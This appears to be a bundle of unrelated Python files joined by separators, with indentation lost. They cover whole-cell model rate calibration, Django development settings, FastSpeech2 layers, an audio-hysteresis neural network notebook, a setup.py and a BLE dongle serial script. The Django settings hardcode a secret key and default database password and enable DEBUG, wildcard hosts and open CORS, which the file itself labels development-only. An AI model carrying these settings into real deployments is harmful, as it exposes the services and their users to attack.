eval_rate_law = init_reaction.rate_laws[0].expression._parsed_expression.eval({
wc_lang.Species: init_species_counts,
wc_lang.Compartment: init_compartment_volumes,
})
if eval_rate_law:
model_kcat.value = average_rate / eval_rate_law
determined_init_kcat.append(model_kcat.value)
else:
undetermined_init_kcat.append(model_kcat)
else:
model_kcat.value = 0.
# Calibrate elongation reaction
el_reaction = model.reactions.get_one(id='translation_elongation_' + mrna_kb.id)
el_species_counts = {}
for species in el_reaction.rate_laws[0].expression.species:
el_species_counts[species.id] = species.distribution_init_concentration.mean
model_Km = model.parameters.get_one(
id='K_m_{}_{}'.format(el_reaction.id, species.species_type.id))
if model_Km:
if species.distribution_init_concentration.mean:
model_Km.value = beta * species.distribution_init_concentration.mean \
/ Avogadro.value / species.compartment.init_volume.mean
model_Km.comments = 'The value was assumed to be {} times the concentration of {} in {}'.format(
beta, species.species_type.id, species.compartment.name)
else:
model_Km.value = 1e-05
model_Km.comments = 'The value was assigned to 1e-05 because the concentration of ' +\
'{} in {} was zero'.format(species.species_type.id, species.compartment.name)
for func in el_reaction.rate_laws[0].expression.functions:
for species in func.expression.species:
el_species_counts[species.id] = species.distribution_init_concentration.mean
for obs in func.expression.observables:
for species in obs.expression.species:
el_species_counts[species.id] = species.distribution_init_concentration.mean
model_kcat = model.parameters.get_one(id='k_cat_{}'.format(el_reaction.id))
if average_rate:
model_kcat.value = 1.
eval_rate_law = el_reaction.rate_laws[0].expression._parsed_expression.eval({
wc_lang.Species: el_species_counts,
wc_lang.Compartment: init_compartment_volumes,
})
if eval_rate_law:
model_kcat.value = average_rate / eval_rate_law
determined_el_kcat.append(model_kcat.value)
else:
undetermined_el_kcat.append(model_kcat)
else:
model_kcat.value = 0.
# Calibrate translocation reaction
conc_per_comp = {}
for protein in protein_model.species:
conc_per_comp[protein.compartment] = protein.distribution_init_concentration.mean
for cplx_st, stoic in complex_model_stoic.items():
for cplx_species in cplx_st.species:
if cplx_species.distribution_init_concentration:
if cplx_species.compartment in conc_per_comp:
conc_per_comp[cplx_species.compartment] += stoic * \
cplx_species.distribution_init_concentration.mean
else:
conc_per_comp[cplx_species.compartment] = stoic * \
cplx_species.distribution_init_concentration.mean
translation_compartment = cytosol if mrna_kb_compartment_id == 'c' else mitochondrion
for compartment, trans_reaction in self._translocation_reactions[mrna_kb].items():
trans_species_counts = {}
for species in trans_reaction.rate_laws[0].expression.species:
trans_species_counts[species.id] = species.distribution_init_concentration.mean
model_Km = model.parameters.get_one(
id='K_m_{}_{}'.format(trans_reaction.id, species.species_type.id))
if model_Km:
if species.distribution_init_concentration.mean:
model_Km.value = beta * species.distribution_init_concentration.mean \
/ Avogadro.value / species.compartment.init_volume.mean
model_Km.comments = 'The value was assumed to be {} times the concentration of {} in {}'.format(
beta, species.species_type.id, species.compartment.name)
else:
model_Km.value = 1e-05
model_Km.comments = 'The value was assigned to 1e-05 because the concentration of ' +\
'{} in {} was zero'.format(species.species_type.id, species.compartment.name)
for func in trans_reaction.rate_laws[0].expression.functions:
for species in func.expression.species:
trans_species_counts[species.id] = species.distribution_init_concentration.mean
for obs in func.expression.observables:
for species in obs.expression.species:
trans_species_counts[species.id] = species.distribution_init_concentration.mean
model_kcat = model.parameters.get_one(id='k_cat_{}'.format(trans_reaction.id))
if average_rate:
model_kcat.value = 1.
eval_rate_law = trans_reaction.rate_laws[0].expression._parsed_expression.eval({
wc_lang.Species: trans_species_counts,
wc_lang.Compartment: init_compartment_volumes,
})
if eval_rate_law:
model_kcat.value = conc_per_comp[compartment] / conc_per_comp[translation_compartment] * \
average_rate / eval_rate_law
determined_transloc_kcat.append(model_kcat.value)
else:
undetermined_transloc_kcat.append(model_kcat)
else:
model_kcat.value = 0.
median_init_kcat = numpy.median(determined_init_kcat)
if not numpy.isnan(median_init_kcat):
for model_kcat in undetermined_init_kcat:
model_kcat.value = median_init_kcat
model_kcat.comments = 'Set to the median value because it could not be determined from data'
else:
for model_kcat in undetermined_init_kcat:
model_kcat.value = 1.
model_kcat.comments = 'Set to 1 because it could not be determined from median value'
median_el_kcat = numpy.median(determined_el_kcat)
if not numpy.isnan(median_el_kcat):
for model_kcat in undetermined_el_kcat:
model_kcat.value = median_el_kcat
model_kcat.comments = 'Set to the median value because it could not be determined from data'
else:
for model_kcat in undetermined_el_kcat:
model_kcat.value = 1.
model_kcat.comments = 'Set to 1 because it could not be determined from median value'
median_transloc_kcat = numpy.median(determined_transloc_kcat)
if not numpy.isnan(median_transloc_kcat):
for model_kcat in undetermined_transloc_kcat:
model_kcat.value = median_transloc_kcat
model_kcat.comments = 'Set to the median value because it could not be determined from data'
else:
for model_kcat in undetermined_transloc_kcat:
model_kcat.value = 1.
model_kcat.comments = 'Set to 1 because it could not be determined from median value'
def _import_cytosolic_trna_into_mitochondria(self, cytosolic_trna_ids):
""" Create reactions and rate laws for importing cytosolic tRNAs into the mitochondria.
The concentrations of imported tRNAs in the mitochondria are set based on
the provided fraction and the rates of transport are calibrated accordingly to achieve
steady-states
Args:
cytosolic_trna_ids (:obj:`list`): list of species type IDs of cytosolic tRNAa to be
imported into the mitochondria
"""
kb = self.knowledge_base
model = self.model
submodel = self.submodel
beta = self.options['beta']
mitochondrial_cytosolic_trna_partition = self.options['mitochondrial_cytosolic_trna_partition']
mitochondrial_exosome = self.options['mitochondrial_exosome']
cytosol = model.compartments.get_one(id='c')
mitochondria = model.compartments.get_one(id='m')
rna_deg_submodel = model.submodels.get_one(id='rna_degradation')
exosome_species = model.species_types.get_one(
name=mitochondrial_exosome).species.get_one(compartment=mitochondria)
Avogadro = model.parameters.get_or_create(
id='Avogadro',
type=None,
value=scipy.constants.Avogadro,
units=unit_registry.parse_units('molecule mol^-1'))
for trna_id in cytosolic_trna_ids:
trna_species_type = model.species_types.get_one(id=trna_id)
if not trna_species_type.species.get_one(compartment=mitochondria):
cyto_trna_species = trna_species_type.species.get_one(compartment=cytosol)
total_conc = cyto_trna_species.distribution_init_concentration.mean
cyto_trna_species.distribution_init_concentration.mean = total_conc * \
(1 - mitochondrial_cytosolic_trna_partition)
cyto_trna_species.distribution_init_concentration.comments = \
'Value is adjusted to account for import into the mitochondria'
mito_trna_species = model.species.get_or_create(
species_type=trna_species_type, compartment=mitochondria)
mito_trna_species.id = mito_trna_species.gen_id()
conc_model = model.distribution_init_concentrations.create(
species=mito_trna_species,
mean=total_conc * mitochondrial_cytosolic_trna_partition,
units=unit_registry.parse_units('molecule'),
comments='Value is set to {} of the total cellular concentration'.format(
mitochondrial_cytosolic_trna_partition),
)
conc_model.id = conc_model.gen_id()
# Generate import reaction
import_reaction = model.reactions.create(
submodel=self.submodel, id='trna_import_{}'.format(trna_id),
name='import of {} into the mitochondria'.format(trna_id),
reversible=False)
import_reaction.participants.append(
cyto_trna_species.species_coefficients.get_or_create(coefficient=-1))
import_reaction.participants.append(
mito_trna_species.species_coefficients.get_or_create(coefficient=1))
# Generate rate law for import reaction
import_constant = model.parameters.create(
id='{}_import_constant'.format(trna_id),
type=None,
units=unit_registry.parse_units('molecule^-1 s^-1'),
)
expression = '{} * {}'.format(import_constant.id, cyto_trna_species.id)
import_rate_law_expression, error = wc_lang.RateLawExpression.deserialize(expression, {
wc_lang.Species: {cyto_trna_species.id: cyto_trna_species},
wc_lang.Parameter: {import_constant.id: import_constant},
})
assert error is None, str(error)
import_rate_law = model.rate_laws.create(
direction=wc_lang.RateLawDirection.forward,
type=None,
expression=import_rate_law_expression,
reaction=import_reaction,
units=unit_registry.parse_units('s^-1'),
)
import_rate_law.id = import_rate_law.gen_id()
# Calibrate import rate
rna_kb = kb.cell.species_types.get_one(id=trna_id)
half_life = rna_kb.properties.get_one(property='half-life').get_value()
mean_doubling_time = model.parameters.get_one(id='mean_doubling_time').value
average_rate = utils.calc_avg_syn_rate(
total_conc, half_life, mean_doubling_time)
import_constant.value = 1.
eval_rate_law = import_rate_law_expression._parsed_expression.eval({
wc_lang.Species: {cyto_trna_species.id: total_conc * \
(1 - mitochondrial_cytosolic_trna_partition)}
})
if eval_rate_law:
import_constant.value = mitochondrial_cytosolic_trna_partition / \
(1 - mitochondrial_cytosolic_trna_partition) * \
average_rate / eval_rate_law
else:
import_constant.value = 0.
# Generate degradation reaction for imported tRNA
metabolic_participants = ['amp', 'cmp', 'gmp', 'ump', 'h2o', 'h']
metabolites = {}
for met in metabolic_participants:
met_species_type = model.species_types.get_one(id=met)
metabolites[met] = met_species_type.species.get_or_create(
compartment=mitochondria, model=model)
reaction = model.reactions.get_or_create(submodel=rna_deg_submodel,
id='degradation_{}_{}'.format(trna_id, mitochondria.id))
reaction.name = 'degradation of {} in mitochondria'.format(trna_species_type.name)
if trna_id in gvar.transcript_ntp_usage:
ntp_count = gvar.transcript_ntp_usage[trna_id]
else:
seq = rna_kb.get_seq()
ntp_count = gvar.transcript_ntp_usage[trna_id] = {
'A': seq.upper().count('A'),
'C': seq.upper().count('C'),
'G': seq.upper().count('G'),
'U': seq.upper().count('U'),
'len': len(seq)
}
# Adding participants to LHS
reaction.participants.append(mito_trna_species.species_coefficients.get_or_create(
coefficient=-1))
reaction.participants.append(metabolites['h2o'].species_coefficients.get_or_create(
coefficient=-(ntp_count['len']-1)))
# Adding participants to RHS
reaction.participants.append(metabolites['amp'].species_coefficients.get_or_create(
coefficient=ntp_count['A']))
reaction.participants.append(metabolites['cmp'].species_coefficients.get_or_create(
coefficient=ntp_count['C']))
reaction.participants.append(metabolites['gmp'].species_coefficients.get_or_create(
coefficient=ntp_count['G']))
reaction.participants.append(metabolites['ump'].species_coefficients.get_or_create(
coefficient=ntp_count['U']))
reaction.participants.append(metabolites['h'].species_coefficients.get_or_create(
coefficient=ntp_count['len']-1))
# Generate rate law for degradation reaction of imported tRNA
rate_law_exp, _ = utils.gen_michaelis_menten_like_rate_law(
model, reaction, modifiers=[exosome_species],
exclude_substrates=[metabolites['h2o']])
rate_law = model.rate_laws.create(
direction=wc_lang.RateLawDirection.forward,
type=None,
expression=rate_law_exp,
reaction=reaction,
)
rate_law.id = rate_law.gen_id()
# Calibrate degradation reaction of imported tRNA
cyto_deg_reaction = rna_deg_submodel.reactions.get_one(id='degradation_' + rna_kb.id)
cyto_species_counts = {species.id: species.distribution_init_concentration.mean \
for species in cyto_deg_reaction.rate_laws[0].expression.species}
cyto_deg_rate = cyto_deg_reaction.rate_laws[0].expression._parsed_expression.eval({
wc_lang.Species: cyto_species_counts,
wc_lang.Compartment: {
cytosol.id: cytosol.init_volume.mean * \
cytosol.init_density.value}
})
total_deg_rate = utils.calc_avg_deg_rate(total_conc, half_life)
mito_deg_rate = total_deg_rate - cyto_deg_rate
mito_species_counts = {exosome_species.id: exosome_species.distribution_init_concentration.mean}
for species in reaction.get_reactants():
mito_species_counts[species.id] = species.distribution_init_concentration.mean
if model.parameters.get(id='K_m_{}_{}'.format(reaction.id, species.species_type.id)):
model_Km = model.parameters.get_one(
id='K_m_{}_{}'.format(reaction.id, species.species_type.id))
if species.distribution_init_concentration.mean:
model_Km.value = beta * species.distribution_init_concentration.mean \
/ Avogadro.value / species.compartment.init_volume.mean
model_Km.comments = 'The value was assumed to be {} times the concentration of {} in {}'.format(
beta, species.species_type.id, species.compartment.name)
else:
model_Km.value = 1e-05
model_Km.comments = 'The value was assigned to 1e-05 because the concentration of ' +\
'{} in {} was zero'.format(species.species_type.id, species.compartment.name)
model_kcat = model.parameters.get_one(id='k_cat_{}'.format(reaction.id))
if mito_deg_rate:
model_kcat.value = 1.
eval_rate_law = reaction.rate_laws[0].expression._parsed_expression.eval({
wc_lang.Species: mito_species_counts,
wc_lang.Compartment: {
mitochondria.id: mitochondria.init_volume.mean * \
mitochondria.init_density.value}
})
if eval_rate_law:
model_kcat.value = mito_deg_rate / eval_rate_law
else:
model_kcat.value = 0.
else:
model_kcat.value = 0.
|
"""
Django settings for creator project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
from creator.settings.features import *
from corsheaders.defaults import default_headers
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "q$ol+cu=#pp=bgni6d7rn$+$07(!q8g_=aep0w_n+rkhy5q060"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Adds development endpoints to the application.
# This should never be enabled in actual deployments
DEVELOPMENT_ENDPOINTS = os.environ.get("DEVELOPMENT_ENDPOINTS", False)
STAGE = "dev"
ALLOWED_HOSTS = ["*"]
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_HEADERS = list(default_headers) + [
"sentry-trace",
]
DEVELOP = True
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"graphene_django",
"django_s3_storage",
"django_rq",
"creator.analyses",
"creator.dev",
"creator.files",
"creator.status",
"creator.studies",
"creator.users",
"creator.projects",
"creator.buckets",
"creator.email",
"creator.referral_tokens",
"creator.extract_configs",
"creator.jobs",
"creator.releases",
"creator.data_reviews",
"creator.events.apps.EventsConfig",
"creator.organizations",
"creator.data_templates",
"creator",
"corsheaders",
"creator.ingest_runs.apps.IngestRunsConfig",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"corsheaders.middleware.CorsMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"creator.middleware.Auth0AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "creator.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
]
},
}
]
WSGI_APPLICATION = "creator.wsgi.application"
GRAPHENE = {
"SCHEMA": "creator.schema.schema",
"MIDDLEWARE": ["graphene_django.debug.DjangoDebugMiddleware"],
"RELAY_CONNECTION_MAX_LIMIT": 250,
}
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.postgresql",
"NAME": os.environ.get("PG_NAME", "postgres"),
"USER": os.environ.get("PG_USER", "postgres"),
"PASSWORD": os.environ.get("PG_PASS", "postgres"),
"HOST": os.environ.get("PG_HOST", "127.0.0.1"),
"PORT": os.environ.get("PG_PORT", "5432"),
}
}
CACHES = {
"default": {"BACKEND": "django.core.cache.backends.locmem.LocMemCache"}
}
# Redis for RQ
redis_host = os.environ.get("REDIS_HOST", "localhost")
redis_port = os.environ.get("REDIS_PORT", 6379)
redis_pass = os.environ.get("REDIS_PASS", False)
redis_ssl = os.environ.get("REDIS_SSL", "False") == "True"
RQ_DEFAULT_TTL = int(os.environ.get("RQ_DEFAULT_TTL", "60"))
INGEST_QUEUE = "ingest"
RQ_QUEUES = {
"default": {
"HOST": redis_host,
"PORT": redis_port,
"DB": 0,
"DEFAULT_TIMEOUT": 30,
"SSL": redis_ssl,
},
"cavatica": {
"HOST": redis_host,
"PORT": redis_port,
"DB": 0,
"DEFAULT_TIMEOUT": 30,
"SSL": redis_ssl,
},
"dataservice": {
"HOST": redis_host,
"PORT": redis_port,
"DB": 0,
"DEFAULT_TIMEOUT": 30,
"SSL": redis_ssl,
},
"releases": {
"HOST": redis_host,
"PORT": redis_port,
"DB": 0,
"DEFAULT_TIMEOUT": 30,
"SSL": redis_ssl,
},
"aws": {
"HOST": redis_host,
"PORT": redis_port,
"DB": 0,
"DEFAULT_TIMEOUT": 30,
"SSL": redis_ssl,
},
"slack": {
"HOST": redis_host,
"PORT": redis_port,
"DB": 0,
"DEFAULT_TIMEOUT": 30,
"SSL": redis_ssl,
},
INGEST_QUEUE: {
"HOST": redis_host,
"PORT": redis_port,
"DB": 0,
"DEFAULT_TIMEOUT": 30,
"SSL": redis_ssl,
},
}
if redis_pass:
RQ_QUEUES["default"]["PASSWORD"] = redis_pass
RQ_QUEUES["cavatica"]["PASSWORD"] = redis_pass
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"
},
]
AUTH_USER_MODEL = "creator.User"
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Logging Configuration
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"worker": {
"format": "[{asctime}] {levelname} {module}: {message}",
"datefmt": "%H:%M:%S",
"style": "{",
}
},
"handlers": {
"command": {
"level": "INFO",
"class": "rq.utils.ColorizingStreamHandler",
"formatter": "worker",
},
"rq_console": {
"level": "ERROR",
"class": "rq.utils.ColorizingStreamHandler",
"formatter": "worker",
},
"task": {
"level": "INFO",
"class": "rq.utils.ColorizingStreamHandler",
"formatter": "worker",
},
},
"loggers": {
"rq.worker": {"handlers": ["rq_console"], "level": "ERROR"},
"TaskLogger": {"handlers": ["task"], "level": "INFO"},
"creator": {"handlers": ["task"], "level": "INFO"},
"creator.ingest_runs.genomic_data_loader": {
"handlers": ["task"],
"level": "DEBUG",
"propagate": False,
},
},
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(BASE_DIR, "static")
# Email
EMAIL_BACKEND = os.environ.get(
"EMAIL_BACKEND", "django.core.mail.backends.smtp.EmailBackend"
)
EMAIL_HOST = os.environ.get("EMAIL_HOST")
EMAIL_PORT = os.environ.get("EMAIL_PORT")
EMAIL_HOST_USER = os.environ.get("EMAIL_HOST_USER")
EMAIL_HOST_PASSWORD = os.environ.get("EMAIL_HOST_PASSWORD")
EMAIL_USE_TLS = os.environ.get("EMAIL_USE_TLS")
EMAIL_USE_SSL = os.environ.get("EMAIL_USE_SSL", False)
DEFAULT_FROM_EMAIL = os.environ.get(
"DEFAULT_FROM_EMAIL", "admin@kidsfirstdrc.org"
)
# Sets the file storage backend
# Supports file system storage and s3 storage
DEFAULT_FILE_STORAGE = os.environ.get(
"DEFAULT_FILE_STORAGE", "django.core.files.storage.FileSystemStorage"
)
FILE_MAX_SIZE = 2 ** 29
# Maximum time in s allowed before a token may no longer be used to download
DOWNLOAD_TOKEN_TTL = 30
# The relative path directory to upload files to when using file system storage
# The object prefix to upload under when using S3 storage
UPLOAD_DIR = os.environ.get("UPLOAD_DIR", "uploads/")
# Bucket in s3 to keep logs at
LOG_BUCKET = os.environ.get("LOG_BUCKET", "kf-study-creator-logging")
# The relative path to the directory where job logs will be stored
LOG_DIR = os.environ.get("LOG_DIR", "logs/")
AWS_S3_BUCKET_NAME = "kf-study-us-east-1-dev-sd-me0owme0w"
# Auth0 settings
AUTH0_DOMAIN = os.environ.get("AUTH0_DOMAIN", "https://kids-first.auth0.com")
AUTH0_JWKS = os.environ.get(
"AUTH0_JWKS", "https://kids-first.auth0.com/.well-known/jwks.json"
)
AUTH0_AUD = os.environ.get(
"AUTH0_AUD", "https://kf-study-creator.kidsfirstdrc.org"
)
# Service auth credentials
AUTH0_SERVICE_AUD = os.environ.get(
"AUTH0_SERIVCE_AUD", "https://kf-study-creator.kidsfirstdrc.org"
)
AUTH0_MANAGEMENT_AUD = os.environ.get(
"AUTH0_MANAGEMENT_AUD", "https://kids-first.auth0.com/api/v2/"
)
AUTH0_CLIENT = os.environ.get("AUTH0_CLIENT")
AUTH0_SECRET = os.environ.get("AUTH0_SECRET")
CACHE_AUTH0_KEY = os.environ.get("CACHE_AUTH0_KEY", "AUTH0_PUBLIC_KEY")
CACHE_AUTH0_TIMEOUT = os.environ.get("CACHE_AUTH0_TIMEOUT", 86400)
CLIENT_ADMIN_SCOPE = "role:admin"
# Number of seconds after which to timeout any outgoing requests
REQUESTS_TIMEOUT = os.environ.get("REQUESTS_TIMEOUT", 30)
REQUESTS_HEADERS = {"User-Agent": "StudyCreator/development (python-requests)"}
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Fastspeech2 Layers"""
import mindspore.nn as nn
from .SubLayers import MultiHeadAttention, PositionwiseFeedForward
class FFTBlock(nn.Cell):
"""FFT Block"""
def __init__(self, d_model, n_head, d_k, d_v, d_inner, kernel_size, dropout=0.1):
super(FFTBlock, self).__init__()
self.slf_attn = MultiHeadAttention(n_head, d_model, d_k, d_v, dropout=dropout)
self.pos_ffn = PositionwiseFeedForward(
d_model, d_inner, kernel_size, dropout=dropout
)
def construct(self, enc_input, mask=None, slf_attn_mask=None):
enc_output, enc_slf_attn = self.slf_attn(
enc_input, enc_input, enc_input, mask=slf_attn_mask
)
enc_output = self.pos_ffn(enc_output)
return enc_output, enc_slf_attn
class ConvNorm(nn.Cell):
"""Convolutional layer with normalization"""
def __init__(
self,
in_channels,
out_channels,
kernel_size=1,
stride=1,
padding=None,
dilation=1,
bias=True,
w_init_gain="linear",
):
super(ConvNorm, self).__init__()
if padding is None:
assert kernel_size % 2 == 1
padding = int(dilation * (kernel_size - 1) / 2)
self.conv = nn.Conv1d(
in_channels,
out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
dilation=dilation,
has_bias=bias,
pad_mode="pad"
)
def construct(self, signal):
"""ConvNorm construct"""
conv_signal = self.conv(signal)
return conv_signal
class PostNet(nn.Cell):
"""
PostNet: Five 1-d convolution with 512 channels and kernel size 5
"""
def __init__(
self,
n_mel_channels=80,
postnet_embedding_dim=512,
postnet_kernel_size=5,
postnet_n_convolutions=5,
):
super(PostNet, self).__init__()
self.convolutions = nn.CellList()
self.convolutions.append(
nn.SequentialCell([
ConvNorm(
n_mel_channels,
postnet_embedding_dim,
kernel_size=postnet_kernel_size,
stride=1,
padding=int((postnet_kernel_size - 1) / 2),
dilation=1,
w_init_gain="tanh",
),
])
)
for _ in range(1, postnet_n_convolutions - 1):
self.convolutions.append(
nn.SequentialCell([
ConvNorm(
postnet_embedding_dim,
postnet_embedding_dim,
kernel_size=postnet_kernel_size,
stride=1,
padding=int((postnet_kernel_size - 1) / 2),
dilation=1,
w_init_gain="tanh",
),
])
)
self.convolutions.append(
nn.SequentialCell([
ConvNorm(
postnet_embedding_dim,
n_mel_channels,
kernel_size=postnet_kernel_size,
stride=1,
padding=int((postnet_kernel_size - 1) / 2),
dilation=1,
w_init_gain="linear",
),
])
)
self.tanh = nn.Tanh()
self.dropout = nn.Dropout(0.5)
# x : (88, 1289, 80)
def construct(self, x):
"""PostNet construct"""
x = x.transpose((0, 2, 1))
for i in range(len(self.convolutions) - 1):
x = self.convolutions[i](x)
x = self.tanh(x)
x = self.dropout(x)
x = self.convolutions[-1](x)
x = self.dropout(x)
x = x.transpose((0, 2, 1))
return x
|
# %%
# Load dependencies
import numpy as np
import matplotlib.pyplot as plt
import audio_dspy as adsp
import scipy.signal as signal
import tensorflow as tf
from tensorflow import keras
import librosa
from tqdm import tqdm
import os
import random
import sys
sys.path.append('..')
from utils.utils import plot_fft, load_fma_file
from utils.model import Model
import utils.losses as losses
# %%
# load files
filepath = '../Data/fma_small/'
files = os.listdir(filepath)
NUM_FILES = 10
NUM_SAMPLES = 20000
FS = 96000
clean_data = []
for i in tqdm(range(NUM_FILES)):
x = load_fma_file(files, filepath, FS, NUM_SAMPLES)
clean_data.append(x)
clean_data = np.asarray(clean_data)
print(np.shape(clean_data))
# %%
# look at file
idx = 4
plt.plot(clean_data[idx])
# %%
hyst_data = []
drive_data = []
for x in tqdm(clean_data):
drive = random.choice([0.05, 0.25, 0.5, 0.75, 1.0])
hyst = adsp.Hysteresis(drive, 1.0, 1.0, FS, mode='RK4')
y = hyst.process_block(x)
drive_data.append(np.ones_like(x) * drive)
hyst_data.append(y.astype(np.float32))
# %%
idx = 4
plt.figure()
plt.plot(clean_data[idx])
plt.plot(hyst_data[idx])
plt.plot(drive_data[idx])
plt.figure()
freqs, x_fft = plot_fft(clean_data[idx], FS)
freqs, y_fft = plot_fft(hyst_data[idx], FS)
plt.semilogx(freqs, x_fft)
plt.semilogx(freqs, y_fft)
# %%
NUM_TRAIN = 9
NUM_VAL = 1
x_data = np.stack((clean_data, drive_data), axis=1)
print(x_data.shape)
x_train, x_val = np.split(x_data, [NUM_TRAIN])
y_train, y_val = np.split(hyst_data, [NUM_TRAIN])
# %%
OUT_train = np.reshape(y_train, (NUM_TRAIN, NUM_SAMPLES, 1))
OUT_val = np.reshape(y_val, (NUM_VAL, NUM_SAMPLES, 1))
IN_train = np.reshape(x_train.transpose((0, 2, 1)), (NUM_TRAIN, NUM_SAMPLES, 2))
IN_val = np.reshape(x_val.transpose((0, 2, 1)), (NUM_VAL, NUM_SAMPLES, 2))
print(np.shape(IN_train))
# %%
plt.plot(IN_train[0, :, 0])
plt.plot(IN_train[0, :, 1])
print(IN_train.dtype)
print(OUT_train.dtype)
# %%
def model_loss(target_y, predicted_y):
return losses.esr_loss(target_y, predicted_y, losses.pre_emphasis_filter) + losses.dc_loss(target_y, predicted_y)
# construct model
model = Model(model_loss, optimizer=keras.optimizers.Adam(learning_rate=5.0e-4))
model.model.add(keras.layers.InputLayer(input_shape=(None, 2)))
model.model.add(keras.layers.GRU(units=32, return_sequences=True))
model.model.add(keras.layers.Dense(1))
model.model.summary()
# %%
model.train(50, IN_train, OUT_train, IN_val, OUT_val)
# %%
# plot metrics
plt.figure()
model.plot_loss()
plt.figure()
model.plot_error()
# %%
# Test prediction
idx = 2
print(np.shape(x_data[idx]))
predictions = model.model.predict(IN_train[idx].reshape(1, NUM_SAMPLES, 2)).flatten()
print(np.shape(predictions))
# Plot the predictions along with the test data
plt.clf()
plt.title('Training data predicted vs actual values')
plt.plot(hyst_data[idx], 'c', label='Actual')
plt.plot(predictions, 'r--', label='Predicted')
plt.legend()
plt.xlim(1000, 4000)
plt.xlabel('Time [samples]')
# %%
freqs, pred_fft = plot_fft(predictions, FS)
freqs, target_fft = plot_fft(hyst_data[idx], FS)
# Plot the predictions along with to the test data
plt.clf()
plt.title('Training data predicted vs actual values')
plt.semilogx(freqs, target_fft, 'b', label='Actual')
plt.semilogx(freqs, pred_fft, 'r--', label='Predicted')
plt.legend()
plt.xlim(50, 20000)
plt.ylim(-5)
plt.xlabel('Frequency [Hz]')
plt.ylabel('Magnitude [dB]')
# %%
|
from setuptools import setup, find_packages
from datetime import datetime
now = datetime.now()
date_time = now.strftime("%Y%m%d%H%M%S")
version_number = "0.0." + date_time
with open("version_info.txt", "w") as f:
f.write(version_number)
with open("README.md", "r") as readme_file:
readme = readme_file.read()
requirements = ["pandas==1.4.1"]
setup(
name="stockeasy",
version=version_number,
author="Adam Blacke",
author_email="adamblacke@gmail.com",
description="A package for a quick and dirty portfolio analysis.",
long_description=readme,
long_description_content_type="text/markdown",
url="https://github.com/AdamBlacke/stockeasy",
packages=find_packages(where='src'),
package_dir={'': 'src'},
install_requires=requirements,
classifiers=[
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
],
)
|
import serial
import time
connecting_to_dongle = 0
print("Connecting to dongle...")
# Trying to connect to dongle until connected. Make sure the port and baudrate is the same as your dongle.
# You can check in the device manager to see what port then right-click and choose properties then the Port Settings
# tab to see the other settings
while connecting_to_dongle == 0:
try:
console = serial.Serial(
port='COM14',
baudrate=57600,
parity="N",
stopbits=1,
bytesize=8,
timeout=0
)
if console.is_open.__bool__():
connecting_to_dongle = 1
except:
print("Dongle not connected. Please reconnect Dongle.")
time.sleep(5)
print("\n\nConnected to Dongle.\n")
print("\n Welcome to the Eddystone example!\n\n")
new_input = 1
while 1 and console.is_open.__bool__():
# get keyboard input once
if (new_input == 1):
# Python 2 users
# input = raw_input("Enter the Eddystone url hex string: ")
new_input = input("Enter the Eddystone url hex string: ")
time.sleep(0.1)
# sends the commands to the dongle. Important to send the \r as that is the return-key.
console.write(str.encode("AT+ADVDATA=03:03:aa:fe "))
console.write(new_input.encode())
console.write('\r'.encode())
time.sleep(0.1)
console.write(str.encode("AT+ADVSTART=0;200;3000;0;"))
console.write('\r'.encode())
out = ''
# let's wait one second before reading output (let's give device time to answer)
time.sleep(1)
while console.inWaiting() > 0:
out += console.read(console.inWaiting()).decode()
else:
if not out.isspace():
# We make sure it doesn't print the same message over and over again by setting [out] to blankspace
# after printing once and check for blankspace before print again
print(">>" + out)
out = " "
|
"""
Pypkg
"""
|
"""This module contains input/output functions.
There are two types of data being handled: session data and gene library data.
Session data:
A dict containing the following attributes from the SessionData object:
* general_settings
* param_info
* advanced_mutate
* global_stats_display
